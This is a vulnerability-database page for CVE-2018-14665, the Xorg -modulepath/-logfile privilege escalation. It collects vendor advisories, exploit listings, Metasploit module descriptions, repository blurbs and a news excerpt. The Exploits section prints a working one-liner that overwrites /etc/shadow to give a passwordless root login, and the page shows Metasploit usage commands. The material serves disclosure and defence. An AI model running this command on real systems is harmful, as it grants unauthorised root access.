
CVE-2018-14665

Published: 25/10/2018 Updated: 22/10/2019
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
CVSS v3 Base Score: 6.6 | Impact Score: 5.9 | Exploitability Score: 0.7
VMScore: 866
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

A flaw was found in xorg-x11-server prior to 1.20.3. An incorrect permission check for the -modulepath and -logfile options when starting the Xorg X server allows unprivileged users who can log in to the system via the physical console to escalate their privileges and run arbitrary code with root privileges.

Vendor Advisories

Synopsis: Important: xorg-x11-server security update. Type/Severity: Security Advisory: Important. Topic: An update for xorg-x11-server is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (C ...
XOrg X server could be made to overwrite files as the administrator ...
Narendra Shinde discovered that incorrect command-line parameter validation in the Xorg X server may result in arbitrary file overwrite, which can result in privilege escalation. For the stable distribution (stretch), this problem has been fixed in version 2:1.19.2-1+deb9u4. We recommend that you upgrade your xorg-server packages. For the detailed s ...
An incorrect permission check for the -modulepath and -logfile options when starting the Xorg X server allows unprivileged users with the ability to log in to the system via the physical console to escalate their privileges and run arbitrary code with root privileges ...
Arch Linux Security Advisory ASA-201810-15. Severity: High. Date: 2018-10-29. CVE-ID: CVE-2018-14665. Package: xorg-server. Type: privilege escalation. Remote: Yes. Link: security.archlinux.org/AVG-788. Summary: The package xorg-server before version 1.20.3-1 is vulnerable to pri ...
Incorrect command-line parameter validation in the Xorg X server can lead to privilege elevation and/or arbitrary file overwrite when the X server is installed with the setuid bit set and unprivileged users have the ability to log in to the system via the physical console. The -modulepath argument can be used to specify an insecure path to modules t ...
IBM Dynamic System Analysis (DSA) Preboot has addressed the following vulnerabilities in xorg-x11 ...
Oracle Solaris Third Party Bulletin - October 2018. Description: The Oracle Solaris Third Party Bulletin announces patches for one or more security vulnerabilities fixed in third party software that is included in Oracle Solaris distributions. Starting January 20, 2015, Third Party Bulletins are released on the same day when Oracle Critic ...
Oracle Linux Bulletin - October 2018. Description: The Oracle Linux Bulletin lists all CVEs that had been resolved and announced in Oracle Linux Security Advisories (ELSA) in the last one month prior to the release of the bulletin. Oracle Linux Bulletins are published on the same day as Oracle Critical ...

Exploits

# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7) # Date: 2018-11-07 # Exploit Author: @bolonobolo # Vendor Homepage: www.x.org/ # Version: 1.19.5 # Tested on: RHEL 7.3 && 7.5 # CVE : CVE-2018-14665 # Explanation # The only condition that have to be met for this PE to work via SSH, is that the legiti ...
# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation # Date: 2018-10-27 # Exploit Author: Marco Ivaldi # Vendor Homepage: www.x.org/ # Version: xorg-x11-server 1.19.0 - 1.20.2 # Tested on: OpenBSD 6.3 and 6.4 # CVE : CVE-2018-14665 # raptor_xorgasm #!/bin/sh # # raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron # Copyrigh ...
## # This module requires Metasploit: metasploit.com/download # Current source: github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' ...
#CVE-2018-14665 - a LPE exploit via Xorg fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges *BSD and any other Xorg desktop also affected #!/bin/sh # local privilege escalation in X11 currently # unpatched in OpenBSD 6.4 stable - ex ...

Mailing Lists

This Metasploit module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 up to 1.20.3. A permission check flaw exists for the -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This Metasplo ...
This Metasploit module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 up to 1.20.3. A permission check flaw exists for the -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module h ...
xorg-x11-server versions prior to 1.20.3 local privilege escalation exploit ...
Xorg X11 server on AIX local privilege escalation exploit ...
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-4328-1 security () debian org www.debian.org/security/ Moritz Muehlenhoff October 25, 2018 www.debian.org/security/faq ...
This Metasploit module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, els ...
xorg-x11-server version 1.20.3 privilege escalation exploit ...
xorg-x11-server versions prior to 1.20.1 local privilege escalation exploit ...
xorg-x11-server versions prior to 1.20.3 modulepath local privilege escalation exploit ...

Metasploit Modules

Xorg X11 Server Local Privilege Escalation

WARNING: Successful execution of this module results in /etc/passwd being overwritten. This module is a port of the OpenBSD X11 Xorg exploit to run on AIX. A permission check flaw exists for the -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjunction with ANSI-C quotes to inject newlines when overwriting /etc/passwd.

msf > use exploit/aix/local/xorg_x11_server
msf exploit(xorg_x11_server) > show targets
    ...targets...
msf exploit(xorg_x11_server) > set TARGET <target-id>
msf exploit(xorg_x11_server) > show options
    ...show and set options...
msf exploit(xorg_x11_server) > exploit

Xorg X11 Server SUID privilege escalation

This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for the -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708). A CentOS default install will require console auth for the user's session. Cron launches the payload, so if SELinux is enforcing, exploitation may still be possible, but the module will bail. Xorg must have SUID permissions and may not start if already running. On exploitation a crontab.old backup file will be created by Xorg. This module will remove the .old file and restore crontab after successful exploitation. Failed exploitation may result in a corrupted crontab. On successful exploitation, artifacts will be created consistent with starting Xorg and running a cron job.

msf > use exploit/multi/local/xorg_x11_suid_server
msf exploit(xorg_x11_suid_server) > show targets
    ...targets...
msf exploit(xorg_x11_suid_server) > set TARGET <target-id>
msf exploit(xorg_x11_suid_server) > show options
    ...show and set options...
msf exploit(xorg_x11_suid_server) > exploit

Xorg X11 Server SUID modulepath Privilege Escalation

This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for the -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with CentOS 7 (1708). A CentOS default install will require console auth for the user's session. Xorg must have SUID permissions and may not start if already running. On successful exploitation, artifacts will be created consistent with starting Xorg.

msf > use exploit/multi/local/xorg_x11_suid_server_modulepath
msf exploit(xorg_x11_suid_server_modulepath) > show targets
    ...targets...
msf exploit(xorg_x11_suid_server_modulepath) > set TARGET <target-id>
msf exploit(xorg_x11_suid_server_modulepath) > show options
    ...show and set options...
msf exploit(xorg_x11_suid_server_modulepath) > exploit

Github Repositories

Reporting This module requires Metasploit: metasploit.com/download welcome to this page Ethical hacking Khdira class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::Kernel include Msf::Post::Linux::System def init

OpenBsd_CVE-2018-14665

CVE-2018-14665 0x00 Introduction: Indian security researcher Narendra Shinde found a high-severity vulnerability (CVE-2018-14665) in the X.Org Server package that lets an ordinary account escalate to root. It affects the major Linux distributions, including OpenBSD, Debian, Ubuntu, CentOS, Red Hat and Fedora. The Xorg X project provides the open-source implementation of the X Window System (X11, or simply X, the windowing system for bitmap displays

CVE-2018-14665 Here you can find my analysis and PoC for the most used Linux distributions. For now I started from Redhat; this is the link for the official RHSA: RHSA-2018:3410

Next-Generation Linux Kernel Exploit Suggester

Linux Exploit Suggester 2 Next-generation exploit suggester based on Linux_Exploit_Suggester Key Improvements Include: More exploits! (Last updated: March 27, 2019) Option to download exploit code directly from Exploit DB Accurate wildcard matching This expands the scope of searchable exploits Output colorization for easy viewing And more to come! This script is extremely

exploits and proof-of-concept vulnerability demonstration files from the team at Hacker House

Exploits Exploits and proof-of-concept code from the team at Hacker House. Filename / Description: AirWatchMDMJailbreakBypass.txt Bypass jailbreak detection on mobile device management AirWatch for iOS; AIX-0days.txt AIX 4.2 local root vulnerabilities; amanda-amstar.txt Advanced Maryland Automatic Network Disk Archiver local root privilege escalation exploit; amanda-back

Our xorg-kit :)

xorg-kit 1.19-prime branch. Xorg-kit is an overlay containing all core ebuilds related to xorg for Funtoo Linux. It is designed to exist on users' systems as an overlay, providing the ability for users to control what branch of xorg-kit they are using. It is designed to be a part of the Funtoo Linux kits system. The 1.19-prime branch of xorg-kit is the current, stable curated bra

Project overview: The lifecycle of a Red Team attack, which comprises information gathering, attack attempts to gain access, persistence, privilege escalation, network reconnaissance, lateral movement, data analysis (with further persistence built on that), and cleaning up and withdrawing once the attack is over. Related resource list: mitre-attack.github.io/ MITRE's

A handy collection of my public exploits, all in one place.

exploits "You can't argue with a root shell" -- Felix "FX" Lindner Linux raptor_chown.c Linux 2.6.x < 2.6.7-rc3 (CVE-2004-0497) Missing DAC controls in sys_chown() on Linux raptor_prctl.c Linux 2.6.x from 2.6.13 up to versions before 2.6.17.4 (CVE-2006-2451) Suid_dumpable bug raptor_prctl2.c Linux 2.6.x from 2.6.13 up to versions bef

Localroot Compile

Localroot Exploit This repository is a place where Localroot has been compiled and tested. Linux Kernel Exploit with Compile: #CVE / #Description / #Kernels: Linux kernel XFRM Subsystem UAF [3.x - 5.x kernels] (Ubuntu 14.04 / 16.04 Server 4.4 LTS kernels, CentOS 8 4.18 kernels, Red Hat Enterprise Linux 4 4.18 kernels, Ubuntu 18.04 Server LTS 4.15 kernels) CVE-2020-72

Information Gathering

RedTeam Information Gathering. Project overview: The lifecycle of a Red Team attack, which comprises information gathering, attack attempts to gain access, persistence, privilege escalation, network reconnaissance, lateral movement, data analysis (with further persistence built on that), and cleaning up and withdrawing once the attack is over. Another project dedicated to scanning and cracking. Another red team resource

"URL" transfer helper: a record of the good online sites I use day to day.

Resource-list author: Echocipher mail: echocipher@163.com blog: echocipher.github.io The project started when I saw someone else's shared collection of blog links, so I drew on its content to form this project; if it infringes, please let me know. I tidied up the format and added some content I use day to day; duplicates or omissions are hard to avoid, so if you have related content to recommend or other

2019 red team resource links. The resources were not compiled by me; they come from the internet. Because they are not widely circulated, I am making a backup and sharing them here.

Project overview: The lifecycle of a Red Team attack, which comprises information gathering, attack attempts to gain access, persistence, privilege escalation, network reconnaissance, lateral movement, data analysis (with further persistence built on that), and cleaning up and withdrawing once the attack is over. Related resource list: mitre-attack.github.io/ MITRE's

Red-Team Attack Guid

Project overview: This project collects and organizes the following aspects of Red Team work: Red Team attack mindset, Red Team attack tools, Red Team attack methods. Highlights: mitre-attack.github.io/ MITRE's wiki summarizing attack techniques; huntingday.github.io MITRE | ATT&CK Chinese site; arxiv.org Cornell University open documents; www.owas

Related resource list: mitre-attack.github.io/ MITRE's wiki summarizing attack techniques; huntingday.github.io MITRE | ATT&CK Chinese site; arxiv.org Cornell University open documents; www.owasp.org.cn/owasp-project/owasp-things OWASP projects; www.irongeek.com/i.php?page=security/hackingillustrated domestic and international security conferences

Red team tools I have accumulated day to day, plus scripts I wrote myself; these lean toward handy DIY tools rather than commonly used ones like msf/awvs/xray.

redtool Red team tools I have accumulated day to day, plus scripts I wrote myself; these lean toward handy DIY tools rather than commonly used ones like msf/awvs/xray, and the collection is growing slowly. Notes: File name / Description: cve-2017-10271.py vulnerability PoC; cve-2020-0796-scanner.zip vulnerability scanner; HTTP代码爬取.zip crawls usable proxies from an HTTP proxy pool; Layer子域名挖掘机.zip subdomain

Project overview: The lifecycle of a Red Team attack, which comprises information gathering, attack attempts to gain access, persistence, privilege escalation, network reconnaissance, lateral movement, data analysis (with further persistence built on that), and cleaning up and withdrawing once the attack is over. Related resource list: mitre-attack.github.io/ MITRE's

Project overview: information gathering, attack attempts to gain access, persistence, privilege escalation, network reconnaissance, lateral movement, data analysis (with further persistence built on that), and erasing traces. Security-related resource list: arxiv.org Cornell University open documents; github.com/sindresorhus/awesome the awesome series; www.owasp.org.cn/owasp-pr

PoC in GitHub 2020 CVE-2020-0014 It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable. This could lead to a local escalation of privilege with no additional execution privileges needed. User action is needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9 Android-10. Android ID: A-1286745

PoC auto collect from GitHub.

PoC in GitHub 2020 CVE-2020-0022 In reassemble_and_dispatch of packet_fragmenter.cc, there is a possible out of bounds write due to an incorrect bounds calculation. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9 Andr

Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out current Contents: CVE-2011-2856 CVE-2011-3243 CVE-2013-2618 CVE-2013-6632 CVE-2014-1701 CVE-2014-1705 CVE-2014-1747 CVE-2014-3176 CVE-2014-6332 CVE-2014-7927 CVE-2014-7928 CVE-2015-0072 CVE-2015-0235 CVE-2015-0240 CVE-2015-1233 CVE-2015-1242 CVE-2015-1268 CV

Awesome CVE PoC A curated list of CVE PoCs. Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out awesome-web-security. Please read the contribution guidelines before contributing. This repo is full of PoCs for CVEs. If you enjoy this awesome list and would like to support it, check out my Patreon page :

Recent Articles

Trivial Bug in X.Org Gives Root Permission on Linux and BSD Systems
BleepingComputer • Ionut Ilascu • 26 Oct 2018

A vulnerability that is trivial to exploit allows privilege escalation to root level on Linux and BSD distributions using X.Org server, the open source implementation of the X Window System that offers the graphical environment.
The flaw is now identified as CVE-2018-14665 (credited to security researcher Narendra Shinde). It has been present in xorg-server for two years, since version 1.19.0 and is exploitable by a limited user as long as the X server runs with elevated permissions.
...